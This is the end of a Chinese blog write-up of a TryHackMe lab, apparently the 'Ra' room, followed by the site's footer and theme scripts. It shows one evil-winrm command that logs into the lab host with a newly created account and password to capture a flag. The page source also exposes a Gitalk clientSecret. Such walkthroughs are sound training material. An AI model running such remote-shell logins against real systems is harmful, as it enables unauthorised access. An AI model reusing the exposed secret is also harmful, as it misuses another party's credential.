<p>  <img src="https://pic.imgdb.cn/item/672dd59bd29ded1a8c2ed702.png" alt=""></p>
<p>  然后再用 <code>evil-winrm</code> 连新账户 <code>noone:qwq2501#</code></p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i windcorp.thm -u noone -p &#x27;qwq2501#&#x27;</span><br></pre></td></tr></table></figure>
<p>  连上去拿到 <code>Flag 3</code></p>
</li>
</ul>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>noone___
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://noone40404.github.io/2024/11/07/THM%E6%89%93%E9%9D%B6%E6%97%A5%E5%AF%8418%EF%BC%9ARA/" title="THM打靶日寄18-RA">http://noone40404.github.io/2024/11/07/THM打靶日寄18：RA/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/THM/" rel="tag"><i class="fa fa-tag"></i> THM</a>
              <a href="/tags/%E9%9D%B6%E5%9C%BA/" rel="tag"><i class="fa fa-tag"></i> 靶场</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/10/28/THM%E6%89%93%E9%9D%B6%E6%97%A5%E5%AF%8417%EF%BC%9AHolo/" rel="prev" title="THM打靶日寄17-Holo">
      <i class="fa fa-chevron-left"></i> THM打靶日寄17-Holo
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/11/10/THM%E6%89%93%E9%9D%B6%E6%97%A5%E5%AF%8419%EF%BC%9AThe%20Return%20of%20the%20Yeti/" rel="next" title="THM打靶日寄19-The Return of the Yeti">
      THM打靶日寄19-The Return of the Yeti <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="noone___"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">noone___</p>
  <div class="site-description" itemprop="description">自闭中</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">227</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">20</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">89</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/noone40404" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;noone40404" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      友链
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://ctp314.github.io/" title="https:&#x2F;&#x2F;ctp314.github.io&#x2F;" rel="noopener" target="_blank">CTime_Pup_314</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.cnblogs.com/guanlexiangfan/" title="https:&#x2F;&#x2F;www.cnblogs.com&#x2F;guanlexiangfan&#x2F;" rel="noopener" target="_blank">Evitagen</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.luogu.com.cn/blog/i-am-zhiyangfan/" title="https:&#x2F;&#x2F;www.luogu.com.cn&#x2F;blog&#x2F;i-am-zhiyangfan&#x2F;" rel="noopener" target="_blank">zhiyangfan</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.cnblogs.com/Vitheon/" title="https:&#x2F;&#x2F;www.cnblogs.com&#x2F;Vitheon&#x2F;" rel="noopener" target="_blank">Vareal</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">noone___</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script data-pjax async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/pjax/pjax.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '.languages',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[data-pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.dataset.pjax !== undefined) {
      script.dataset.pjax = '';
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>




  
  <script data-pjax>
    (function(){
      var canonicalURL, curProtocol;
      //Get the <link> tag
      var x=document.getElementsByTagName("link");
		//Find the last canonical URL
		if(x.length > 0){
			for (i=0;i<x.length;i++){
				if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
					canonicalURL=x[i].href;
				}
			}
		}
    //Get protocol
	    if (!canonicalURL){
	    	curProtocol = window.location.protocol.split(':')[0];
	    }
	    else{
	    	curProtocol = canonicalURL.split(':')[0];
	    }
      //Get current URL if the canonical URL does not exist
	    if (!canonicalURL) canonicalURL = window.location.href;
	    //Assign script content. Replace current URL with the canonical URL
      !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})();
  </script>




  
<script src="/js/local-search.js"></script>













    <div id="pjax">
  

  
      

<script>
  if (typeof MathJax === 'undefined') {
    window.MathJax = {
      loader: {
          load: ['[tex]/mhchem'],
        source: {
          '[tex]/amsCd': '[tex]/amscd',
          '[tex]/AMScd': '[tex]/amscd'
        }
      },
      tex: {
        inlineMath: {'[+]': [['$', '$']]},
          packages: {'[+]': ['mhchem']},
        tags: 'ams'
      },
      options: {
        renderActions: {
          findScript: [10, doc => {
            document.querySelectorAll('script[type^="math/tex"]').forEach(node => {
              const display = !!node.type.match(/; *mode=display/);
              const math = new doc.options.MathItem(node.textContent, doc.inputJax[0], display);
              const text = document.createTextNode('');
              node.parentNode.replaceChild(text, node);
              math.start = {node: text, delim: '', n: 0};
              math.end = {node: text, delim: '', n: 0};
              doc.math.push(math);
            });
          }, '', false],
          insertedScript: [200, () => {
            document.querySelectorAll('mjx-container').forEach(node => {
              let target = node.parentNode;
              if (target.nodeName.toLowerCase() === 'li') {
                target.parentNode.classList.add('has-jax');
              }
            });
          }, '', false]
        }
      }
    };
    (function () {
      var script = document.createElement('script');
      script.src = '//cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js';
      script.defer = true;
      document.head.appendChild(script);
    })();
  } else {
    MathJax.startup.document.state(0);
    MathJax.texReset();
    MathJax.typeset();
  }
</script>

    

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : 'ebdb5b537395179b4514',
      clientSecret: 'd0843e5853efe963ca9983db6cac3a1f9d736856',
      repo        : 'noone40404.github.io',
      owner       : 'noone40404',
      admin       : ['noone40404'],
      id          : 'b39bf0cd80079734bf4ccbc818f54a53',
        language: 'zn-CN',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

    </div>
</body>
</html>
